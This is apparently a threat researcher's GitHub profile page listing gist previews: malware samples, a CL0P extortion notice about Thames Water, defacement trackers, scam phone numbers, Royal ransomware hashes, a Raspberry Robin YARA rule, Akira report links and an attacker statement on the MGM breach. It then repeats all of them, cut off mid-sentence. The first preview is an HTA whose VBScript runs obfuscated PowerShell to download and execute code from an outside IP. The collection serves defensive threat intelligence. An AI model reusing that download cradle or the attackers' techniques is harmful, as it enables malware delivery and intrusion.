BushidoToken BushidoUK

## Docs_password HTA
<script language="VBScript">

	Function dl()
		Dim var_shell
		Set var_shell = CreateObject("Wscript.Shell")
		var_shell.run "powershell -c $s1='IE';$s2='X(New-Object Net.WebClie';$s3='nt).Downlo';$s4='adString(''hxxp://159.223.37[.]182/update'')';IEX ($s1+$s2+$s3+$s4)", 0, true

	End Function

	dl

## AutoUpdate JS
(function(_0x25cba2, _0x45eb40) {
        var a0_0x501b44 = {
                _0x17e23d: 0x38,
                _0x205270: 'CuXi',
                _0x4af451: 0x55,
                _0x3d4924: 0x44,
                _0x2c4ea4: 0x28,
                _0x561b2d: 'Sg20',
                _0x5656b1: 0x37,
                _0x3c1bf0: 'Urg4',

## Message from CL0P Leaks
Website:
www.thameswater.co.uk
Revenue:
$2 billion

Thames Water supply much of critical water services to people and companies.
This company is public and this mean not only they bring water and sewage services to millions of people they also allow many people and company to invest with their stock offering.
Companies like this have much responsibility and we contact them and tell them that they have very bad holes in their systems. ALL SYSTEMS.

We spent months in the company system and saw first hand evidence of very bad practice.

## Tracking web defacements.txt
Hacked By ./EcchiExploit
2E4H - BHIOFF - Manusia Biasa Team
BhiOfficial

Banyumas Cyber Team
sayahekwr@protonmail.com
LulzGhost Team
Manusia Biasa Team

http.html:"EcchiExploit"

## CN_Scammer_Numbers.txt
+44 7737 359848 Three
+44 7521 967428 O2
+44 7415 787846 EE
+44 7523 322875 O2
+44 7419 756102 EE
+44 7575 186994 Three
+44 7497 580997 EE
+44 7544 631585 O2
+44 70 3401 7692 "Protected" / Unknown
+353 (89) 499 6551 Liffey Telecom / Tesco Mobile

## Royal_Ransomware_hashes_Dec_2022
1.exe | Netherlands | First seen   : 2022-12-23
de025f921dd477c127fba971b9f90accfb58b117274ba1afb1aaf2222823b6ac

qut.dll | Australia | First seen   : 2022-12-23
8e01ecf9d804454f34eeceb0f7793f4884be8868886a646526419fc2e2bbb648

gdr.exe | Argentina | First seen   : 2022-12-21
bc06587b96b2628480d47579bcc2519a9da2b55aa037a49af4cd03811c534f66

windows_encryptor.exe | Hong Kong | First seen   : 2022-12-18

## RaspberryRobin_C2Domains.yara
import "vt"
rule RaspberryRobin_C2Domains{
	meta:
    description = "Checks for Files with RaspberryRobin C2 domains"
    author = "Will Thomas (@BushidoToken), Equinix Threat Analysis Center (ETAC)"
	  date = "2023-APRIL-14"
	  tlp = "CLEAR"
	  adversary = "DEV-0856"

    strings:

## RedZeiUpdate1H2023.txt
Number	MNO	Voice Mail Theme
+44 24 7522 9208	IP Voice Networks Ltd	Unknown (Chinese)
+44 7404 008579	Lycamobile UK Limited	Visa Information
+44 7424 407427	Lycamobile UK Limited	Visa Information
+44 7405 901628	Lycamobile UK Limited	Visa Information
+44 7496 139575	EE Limited ( TM)	Unknown (Chinese)
+44 7526 013110	Telefonica UK Limited	Chinese Embassy
+44 7526 057134	Telefonica UK Limited	Chinese Embassy
+44 20 8072 0091	TAP GATEWAY LTD	Unknown (Chinese)
+44 7478 993982	Hutchison 3G UK Ltd	Unknown (Chinese)

## Akira Threat Reports.txt
7 May 2023 https://www.bleepingcomputer.com/news/security/meet-akira-a-new-ransomware-operation-targeting-the-enterprise/
9 May 2023 https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/
10 May 2023 https://blog.reconinfosec.com/emergence-of-akira-ransomware-group
10 May 2023 https://cyble.com/blog/unraveling-akira-ransomware/
19 May 2023 https://securitynews.sonicwall.com/xmlpost/akira-ransomware-double-extortion-scheme-encrypts-and-publicly-leaks-sensitive-data/
26 May 2023 https://labs.k7computing.com/index.php/akira-ransomware-unleashing-chaos-using-conti-leaks/
28 June 2023 https://blog.cyble.com/2023/06/28/akira-ransomware-extends-reach-to-linux-platform/
29 June 2023 https://decoded.avast.io/threatresearch/decrypted-akira-ransomware/#how_to
11 July 2023 https://twitter.com/TrendMicroRSRCH/status/1678811395448504325
21 July 2023 https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVA01&VACODE=CIVA-2023-2113

## gist:20b81335c6729dc8e0b5997ca83fa35f
Statement on MGM Resorts International: Setting the record straight
9/14/2023, 7:46:49 PM

We have made multiple attempts to reach out to MGM Resorts International, "MGM". As reported, MGM shutdown computers inside their network as a response to us. We intend to set the record straight.

No ransomware was deployed prior to the initial take down of their infrastructure by their internal teams.

MGM made the hasty decision to shut down each and every one of their Okta Sync servers after learning that we had been lurking on their Okta Agent servers sniffing passwords of people whose passwords couldn't be cracked from their domain controller hash dumps. Resulting in their Okta being completely locked out. Meanwhile we continued having super administrator privileges to their Okta, along with Global Administrator privileges to their Azure tenant. They made an attempt to evict us after discovering that we had access to their Okta environment, but things did not go according to plan.

On Sunday night, MGM implement
	<script language="VBScript">

	Function dl()
	Dim var_shell
	Set var_shell = CreateObject("Wscript.Shell")
	var_shell.run "powershell -c $s1='IE';$s2='X(New-Object Net.WebClie';$s3='nt).Downlo';$s4='adString(''hxxp://159.223.37[.]182/update'')';IEX ($s1+$s2+$s3+$s4)", 0, true

	End Function

	dl
	(function(_0x25cba2, _0x45eb40) {
	var a0_0x501b44 = {
	_0x17e23d: 0x38,
	_0x205270: 'CuXi',
	_0x4af451: 0x55,
	_0x3d4924: 0x44,
	_0x2c4ea4: 0x28,
	_0x561b2d: 'Sg20',
	_0x5656b1: 0x37,
	_0x3c1bf0: 'Urg4',
	Website:
	www.thameswater.co.uk
	Revenue:
	$2 billion

	Thames Water supply much of critical water services to people and companies.
	This company is public and this mean not only they bring water and sewage services to millions of people they also allow many people and company to invest with their stock offering.
	Companies like this have much responsibility and we contact them and tell them that they have very bad holes in their systems. ALL SYSTEMS.

	We spent months in the company system and saw first hand evidence of very bad practice.
	Hacked By ./EcchiExploit
	2E4H - BHIOFF - Manusia Biasa Team
	BhiOfficial

	Banyumas Cyber Team
	sayahekwr@protonmail.com
	LulzGhost Team
	Manusia Biasa Team

	http.html:"EcchiExploit"
	+44 7737 359848 Three
	+44 7521 967428 O2
	+44 7415 787846 EE
	+44 7523 322875 O2
	+44 7419 756102 EE
	+44 7575 186994 Three
	+44 7497 580997 EE
	+44 7544 631585 O2
	+44 70 3401 7692 "Protected" / Unknown
	+353 (89) 499 6551 Liffey Telecom / Tesco Mobile
	1.exe \| Netherlands \| First seen : 2022-12-23
	de025f921dd477c127fba971b9f90accfb58b117274ba1afb1aaf2222823b6ac

	qut.dll \| Australia \| First seen : 2022-12-23
	8e01ecf9d804454f34eeceb0f7793f4884be8868886a646526419fc2e2bbb648

	gdr.exe \| Argentina \| First seen : 2022-12-21
	bc06587b96b2628480d47579bcc2519a9da2b55aa037a49af4cd03811c534f66

	windows_encryptor.exe \| Hong Kong \| First seen : 2022-12-18
	import "vt"
	rule RaspberryRobin_C2Domains{
	meta:
	description = "Checks for Files with RaspberryRobin C2 domains"
	author = "Will Thomas (@BushidoToken), Equinix Threat Analysis Center (ETAC)"
	date = "2023-APRIL-14"
	tlp = "CLEAR"
	adversary = "DEV-0856"

	strings:
	Number MNO Voice Mail Theme
	+44 24 7522 9208 IP Voice Networks Ltd Unknown (Chinese)
	+44 7404 008579 Lycamobile UK Limited Visa Information
	+44 7424 407427 Lycamobile UK Limited Visa Information
	+44 7405 901628 Lycamobile UK Limited Visa Information
	+44 7496 139575 EE Limited ( TM) Unknown (Chinese)
	+44 7526 013110 Telefonica UK Limited Chinese Embassy
	+44 7526 057134 Telefonica UK Limited Chinese Embassy
	+44 20 8072 0091 TAP GATEWAY LTD Unknown (Chinese)
	+44 7478 993982 Hutchison 3G UK Ltd Unknown (Chinese)
	7 May 2023 https://www.bleepingcomputer.com/news/security/meet-akira-a-new-ransomware-operation-targeting-the-enterprise/
	9 May 2023 https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/
	10 May 2023 https://blog.reconinfosec.com/emergence-of-akira-ransomware-group
	10 May 2023 https://cyble.com/blog/unraveling-akira-ransomware/
	19 May 2023 https://securitynews.sonicwall.com/xmlpost/akira-ransomware-double-extortion-scheme-encrypts-and-publicly-leaks-sensitive-data/
	26 May 2023 https://labs.k7computing.com/index.php/akira-ransomware-unleashing-chaos-using-conti-leaks/
	28 June 2023 https://blog.cyble.com/2023/06/28/akira-ransomware-extends-reach-to-linux-platform/
	29 June 2023 https://decoded.avast.io/threatresearch/decrypted-akira-ransomware/#how_to
	11 July 2023 https://twitter.com/TrendMicroRSRCH/status/1678811395448504325
	21 July 2023 https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVA01&VACODE=CIVA-2023-2113
	Statement on MGM Resorts International: Setting the record straight
	9/14/2023, 7:46:49 PM

	We have made multiple attempts to reach out to MGM Resorts International, "MGM". As reported, MGM shutdown computers inside their network as a response to us. We intend to set the record straight.

	No ransomware was deployed prior to the initial take down of their infrastructure by their internal teams.

	MGM made the hasty decision to shut down each and every one of their Okta Sync servers after learning that we had been lurking on their Okta Agent servers sniffing passwords of people whose passwords couldn't be cracked from their domain controller hash dumps. Resulting in their Okta being completely locked out. Meanwhile we continued having super administrator privileges to their Okta, along with Global Administrator privileges to their Azure tenant. They made an attempt to evict us after discovering that we had access to their Okta environment, but things did not go according to plan.

	On Sunday night, MGM implement